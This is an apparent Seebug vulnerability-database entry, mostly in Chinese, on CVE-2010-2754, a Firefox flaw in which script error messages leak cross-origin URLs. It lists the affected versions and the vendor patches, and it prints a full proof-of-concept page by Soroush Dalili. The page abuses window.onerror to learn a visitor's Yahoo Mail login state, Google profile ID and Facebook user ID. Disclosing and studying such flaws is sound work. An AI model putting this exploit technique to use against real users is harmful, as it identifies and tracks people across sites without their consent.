Lucene search
RootSSV:19991HistoryJul 27, 2010 - 12:00 a.m.
Mozilla Firefox出错消息脚本文件名信息泄露漏洞
2010-07-2700:00:00
Root
www.seebug.org
55
0.003 Low
EPSS
Percentile
64.9%
BUGTRAQ ID: 41860
CVE ID: CVE-2010-2754
Firefox是一款流行的开源WEB浏览器。
Firefox中的脚本出错处理方式会显示错误的来源,其中可能包含有敏感信息。假设 http://SampleSite.com/admin.asp 页面使用了以下逻辑:
1- 如果用户没有登录,重新定向到登录页面。
2- 如果用户不是管理员,重新定向到拒绝访问页面。
3- 如果用户为管理员,显示管理员菜单。
攻击者可以使用跨站URL劫持技术确认用户在SampleSite.com所处的状态,并继续执行有针对性的攻击。
Mozilla Firefox 3.6.x
Mozilla Firefox 3.5.x
Mozilla Thunderbird 3.1.x
Mozilla Thunderbird 3.0.x
Mozilla SeaMonkey < 2.0.6
厂商补丁:
Mozilla
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
RedHat
RedHat已经为此发布了一个安全公告(RHSA-2010:0546-01)以及相应补丁:
RHSA-2010:0546-01:Critical: seamonkey security update
链接:https://www.redhat.com/support/errata/RHSA-2010-0546.html
XSUH (Cross Site URL Hijacking) Demo by Soroush Dalili - IRSDL at Yahoo d0t com
<br/>
Tested Platform: This technique has been tested on Mozilla Firefox 3.6.3, 3.5.9, 3.6.4build4.
<br/>
Blog: <a href="http://soroush.secproject.com/blog/">Click Here</a>
<br/>
Mirror Blog: <a href="http://irsdl1.wordpress.com">Click Here</a>
<br/><hr/>
1. Which Version of Yahoo Mail Are You Currently Using: <b><font color="#00FF11"><span id="yahooresult"></span></font></b>
<br/>
2. What Is Your Profile ID in Google.com: <b><font color="#7777FF"><span id="googleresult"></span></font></b>
<br/>
3. What Is Your Facebook User ID If You Play Farmville: <b><font color="#0077FF"><span id="fbresult"></span></font></b>
<br/>
<script>
window.onerror=fnErrorTrap;
function fnErrorTrap(sMsg,sUrl,sLine){
var msg = '';
sUrl = unescape(sUrl);
if(sUrl.indexOf('yahoo')>0) // Yahoo
{
if(sUrl.indexOf('/dc/')>0)
msg = 'You Are Using New Version of Yahoo Mail!';
else if(sUrl.indexOf('/mc/')>0)
msg = 'You Are Using Old Version of Yahoo Mail!';
else
msg = 'You Are Not Logged-in in Yahoo Mail!';
document.getElementById('yahooresult').innerHTML = msg;
}
else if(sUrl.indexOf('google')>0) //Google
{
if(sUrl.indexOf('/ServiceLogin')>0)
msg = 'You Are Not Logged-in in Google.com!';
else if(sUrl.indexOf('/editprofile')>0)
msg = 'You Are Logged-in in Google.com But You Do Not Have Any Profile!';
else if(sUrl.indexOf('/profiles/')>0)
msg = 'Your Profile ID In Google.com Is: '+sUrl.substring(sUrl.lastIndexOf('/')+1);
else
msg = 'You Are Logged-in in Google But I Cannot Find Your Profile ID!!!';
document.getElementById('googleresult').innerHTML = msg;
}else // Facebook
{
if(sUrl.indexOf('login.php')>0)
msg = 'You Are Not Logged-in in Facebook!';
else if(sUrl.indexOf('tos.php')>0)
msg = 'WoW! You Do Not Play Farmville?!!';
else if(sUrl.indexOf('xd_receiver.htm')>0)
{
var temp = sUrl.substring(sUrl.indexOf('uid":'));
msg = 'Your Facebook User ID Is: '+temp.substring(5,temp.indexOf(','));
}
else
msg = 'I Cannot Get The Point!';
document.getElementById('fbresult').innerHTML = msg;
}
return false;
}
if(!(/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)))
alert('Please use Mozilla Firefox');
else
{
document.write('<script src="http://mail.yahoo.com/"><\/script>');
document.write('<script src="http://www.google.com/profiles/me"><\/script>');
document.write('<script src="http://www.facebook.com/login.php?return_session=1&nochrome=1&fbconnect=1&extern=2&display=popup&api_key=80c6ec6628efd9a465dd223190a65bbc&v=1.0&next=http://www.farmville.com/xd_receiver.htm"><\/script>');
}
</script>
Related
prion
prion
Design/Logic Flaw
2010-07-30 13:26:00
cve
cve
CVE-2010-2754
2010-07-30 13:26:00
mozilla
mozilla
Cross-origin data leakage from script filename in error messages — Mozilla
2010-07-20 00:00:00
veracode
veracode
Information Disclosure
2020-04-10 00:45:43
securityvulns
securityvulns
Mozilla Foundation Security Advisory 2010-47
2010-07-24 00:00:00
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
2010-07-24 00:00:00
ubuntucve
ubuntucve
CVE-2010-2754
2010-07-23 00:00:00
oraclelinux
oraclelinux
seamonkey security update
2010-07-21 00:00:00
thunderbird security update
2010-07-21 00:00:00
firefox security update
2010-07-21 00:00:00
nessus
nessus
Scientific Linux Security Update : seamonkey on SL3.x, SL4.x i386/x86_64
2012-08-01 00:00:00
Mandriva Linux Security Advisory : mozilla-thunderbird (MDVSA-2010:169)
2010-09-03 00:00:00
openSUSE Security Update : MozillaThunderbird (openSUSE-SU-2010:0430-2)
2010-07-28 00:00:00
openvas
openvas
CentOS Update for seamonkey CESA-2010:0546 centos3 i386
2010-08-20 00:00:00
CentOS Update for seamonkey CESA-2010:0546 centos3 i386
2010-08-20 00:00:00
Mandriva Update for mozilla-thunderbird MDVSA-2010:169 (mozilla-thunderbird)
2010-09-07 00:00:00
redhat
redhat
(RHSA-2010:0546) Critical: seamonkey security update
2010-07-20 00:00:00
(RHSA-2010:0544) Moderate: thunderbird security update
2010-07-20 00:00:00
(RHSA-2010:0545) Critical: thunderbird security update
2010-07-20 00:00:00
centos
centos
seamonkey security update
2010-08-16 21:36:58
thunderbird security update
2010-08-06 23:32:55
thunderbird security update
2010-07-22 14:50:56
ubuntu
ubuntu
Thunderbird vulnerabilities
2010-07-26 00:00:00
Firefox and Xulrunner vulnerabilities
2010-07-23 00:00:00
Firefox and Xulrunner vulnerability
2010-07-26 00:00:00
osv
osv
xulrunner - several vulnerabilities
2010-07-27 00:00:00
debian
debian
[SECURITY] [DSA 2075-1] New xulrunner packages fix several vulnerabilities
2010-07-27 19:47:58
[Backports-security-announce] Security Update for xulrunner
2010-07-21 09:30:16
[Backports-security-announce] Security Update for xulrunner
2010-07-21 09:30:33
fedora
fedora
[SECURITY] Fedora 13 Update: thunderbird-3.1.1-1.fc13
2010-07-23 02:48:57
[SECURITY] Fedora 13 Update: sunbird-1.0-0.26.b2pre.fc13
2010-07-23 02:48:57
[SECURITY] Fedora 12 Update: gnome-web-photo-0.9-8.fc12
2010-07-23 02:47:25
suse
suse
remote code execution in MozillaFirefox,MozillaThunderbird,seamonkey
2010-07-30 13:10:04
Firefox update to 31.1esr (important)
2014-09-09 18:04:16
freebsd
freebsd
mozilla -- multiple vulnerabilities
2010-07-20 00:00:00
gentoo
gentoo
Mozilla Products: Multiple vulnerabilities
2013-01-08 00:00:00